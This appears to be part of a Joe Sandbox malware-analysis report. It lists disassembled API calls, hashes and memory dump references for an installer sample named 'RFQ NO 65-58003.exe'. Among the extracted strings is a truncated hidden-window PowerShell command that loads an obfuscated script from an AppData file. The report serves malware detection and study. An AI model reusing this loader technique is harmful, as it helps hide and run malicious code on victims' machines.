                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesCreate
                                                              • String ID:
                                                              • API String ID: 415043291-0
                                                              • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                              • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
                                                              • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
                                                              • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,004059C7,?,?,00000000,00405B9D,?,?,?,?), ref: 00405DC7
                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405DDB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                              • Instruction ID: 952e92710cc69b9b43d0c132b1ebcdc485dc7d738455aa6d22c0503b32111fdc
                                                              • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                              • Instruction Fuzzy Hash: 9DD0C972504520ABC2112728AE0C89BBB55EB542717028B35FAA9A22B0CB304C568A98
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,0040343D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 004058C3
                                                              • GetLastError.KERNEL32 ref: 004058D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                              • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
                                                              • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                              • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                              • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                                              • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                              • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402D85
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                              • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
                                                              • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                              • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
                                                              APIs
                                                              • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                              • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
                                                              • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                              • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
                                                              APIs
                                                              • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040E71A,0040CED0,00403383,0040CED0,0040E71A,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                              • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                              • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                              • Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
                                                              • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                              • Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                              • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                              • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                              • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                              • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                              • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                              • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                              • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
                                                              • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                              • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                              • LoadBitmapW.USER32(0000006E), ref: 00404D6D
                                                              • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                              • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
                                                              • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                              • GlobalFree.KERNEL32(?), ref: 0040511D
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
                                                              • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                              • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                              • ShowWindow.USER32(00000000), ref: 004052CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 1638840714-813528018
                                                              • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                              • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                              • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                              • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 004047C0
                                                              • SetWindowTextW.USER32(00000000,?), ref: 004047EA
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040489B
                                                              • CoTaskMemFree.OLE32(00000000), ref: 004048A6
                                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004048D8
                                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004048E4
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6
                                                                • Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E
                                                                • Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
                                                                • Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
                                                                • Part of subcall function 004064A6: CharNextW.USER32(?,00000000,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
                                                                • Part of subcall function 004064A6: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530
                                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4
                                                                • Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
                                                                • Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
                                                                • Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
                                                              Strings
                                                              • (7B, xrefs: 0040486E
                                                              • powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas, xrefs: 0040478A
                                                              • C:\Users\user\AppData\Roaming\afdragsordning, xrefs: 004048C1
                                                              • A, xrefs: 00404894
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
